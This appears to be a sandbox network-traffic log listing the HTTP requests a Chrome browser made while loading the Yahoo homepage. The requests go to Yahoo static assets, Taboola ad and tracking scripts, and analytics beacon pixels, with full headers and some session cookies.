Source: global trafficHTTP traffic detected: GET /aaq/notifications/js/sh-5.17.91.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-geolocation-1.3.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/eid.es5.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /libtrc/impl.20241006-3-RELEASE.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /service-worker.js HTTP/1.1Host: www.yahoo.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.yahoo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/hc/homepage-pwa-defer-1.1.6.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /du/ay/wnsrvbjmeprtfrnfx.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/prebid/prebid-2.0.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eh/prebid-config/bp-fp.json HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/cds-pips.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/img/voiceSearch1x-1620383531565.min.png HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.0fd45e30dadfbc5beb5038219cf70da8.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tdv2_fp/api/resource/WeatherLocationService.favoriteLocation?returnMeta=true&lang=en-US&region=US&site=fp&ssl=1&crumb=2njDuNjfxIK HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /g/images/spaceball.gif HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=ShoppingContent&m_id=react-wafer-shopping&m_mode=json&xhrPathPrefix=%2Ffp_ms%2F_rcv%2Fremote HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-geolocation-1.3.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/cds-pips.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pips.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_td_api/beacon/info?event=activate&spaceId=1197802003&version=1.1.53&scope=https://www.yahoo.com/&subscription_endpoint=null&metadataTime=2&src=notification-sw&code=info HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/service-worker.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1293%2Cx_74%2Cy_123/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/STABLE_DIFFUSION_OUTCROP/ESD/e9b25e04-39a2-48fa-b922-a01abe4d2761__Jsd4LRG6.jpg HTTP/1.1Host: images.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_2048%2Cx_0%2Cy_269/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/6ea50c2ee5893dd6ba068fe3a5f931f1.jpg HTTP/1.1Host: images.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /eh/prebid-config/bp-fp.json HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /g/images/spaceball.gif HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: pips.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=12dfba99-00cf-4f01-ac78-06d6c0d07524,0468abf9-ac9d-470b-a17a-0abbf27eb007,1072b278-f788-45ae-9e2f-e1732f12bcde,1b31ce0a-38da-40ff-8bf8-df7bfd4c3b89,4d305d2a-95ac-41bb-b482-7f09ed368552,637e8837-4314-4f37-8ae7-414f1cd9b94f&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /i.gif HTTP/1.1Host: v-bwllghkff5.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?uid=2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9&ptf=V2luZG93cw==&ptfv=MTAuMC4w&ufv=MTE3LjAuNTkzOC4xMzI=&bnd=R29vZ2xlIENocm9tZQ==&bndv=MTE3&bnd=Tm90O0E9QnJhbmQ=&bndv=OA==&bnd=Q2hyb21pdW0=&bndv=MTE3&mbl=ZmFsc2U= HTTP/1.1Host: cds.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tdv2_fp/api/resource/WeatherLocationService.favoriteLocation?returnMeta=true&lang=en-US&region=US&site=fp&ssl=1&crumb=2njDuNjfxIK HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /i.gif HTTP/1.1Host: v-akfx1y454r.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1293%2Cx_74%2Cy_123/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/STABLE_DIFFUSION_OUTCROP/ESD/e9b25e04-39a2-48fa-b922-a01abe4d2761__Jsd4LRG6.jpg HTTP/1.1Host: images.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_2048%2Cx_0%2Cy_269/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/6ea50c2ee5893dd6ba068fe3a5f931f1.jpg HTTP/1.1Host: images.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: rwf9bb5hj.wc.06yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: dns-aup3nb5p0.sombrero.yahoo.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /noquery/pixel.gif?rand=xkme2lc4o HTTP/1.1Host: cerebro.edna.yahoo.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: ral248z7j.wc.06yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
